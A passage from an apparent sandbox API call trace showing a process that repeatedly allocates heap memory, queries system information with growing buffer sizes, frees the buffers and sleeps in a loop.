(in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.830] Sleep (dwMilliseconds=0x110) [0295.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0295.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0295.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0295.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0295.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0295.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0295.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0295.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0295.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.845] Sleep (dwMilliseconds=0x110) [0295.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0295.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0295.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0295.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0295.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0295.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0295.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0295.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0295.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.861] Sleep (dwMilliseconds=0x110) [0295.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0295.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0295.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0295.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0295.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0295.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0295.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0295.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0295.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.877] Sleep (dwMilliseconds=0x110) [0295.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0295.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0295.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0295.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0295.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0295.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0295.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0295.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0295.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.892] Sleep (dwMilliseconds=0x110) [0295.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0295.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.904] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0295.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0295.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0295.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0295.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0295.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0295.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0295.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.907] Sleep (dwMilliseconds=0x110) [0295.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0295.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0295.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0295.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0295.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0295.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0295.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0295.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0295.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.923] Sleep (dwMilliseconds=0x110) [0295.934] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0295.934] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.935] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0295.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0295.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0295.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0295.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0295.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0295.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0295.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.938] Sleep (dwMilliseconds=0x110) [0295.950] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0295.950] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0295.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0295.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0295.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0295.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0295.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0295.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0295.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.953] Sleep (dwMilliseconds=0x110) [0295.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0295.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0295.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0295.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0295.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0295.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0295.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0295.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0295.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.969] Sleep (dwMilliseconds=0x110) [0295.981] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0295.981] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.982] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0295.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0295.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0295.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0295.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0295.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0295.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0295.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.988] Sleep (dwMilliseconds=0x110) [0295.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0295.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0296.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0296.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0296.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0296.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0296.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0296.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0296.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.004] Sleep (dwMilliseconds=0x110) [0296.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0296.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.013] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0296.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0296.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0296.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0296.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0296.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0296.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0296.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.015] Sleep (dwMilliseconds=0x110) [0296.028] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0296.028] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0296.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0296.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0296.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0296.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0296.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0296.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0296.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.032] Sleep (dwMilliseconds=0x110) [0296.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0296.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0296.052] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0296.052] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.053] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0296.053] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0296.053] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.053] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0296.053] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0296.053] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.054] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: 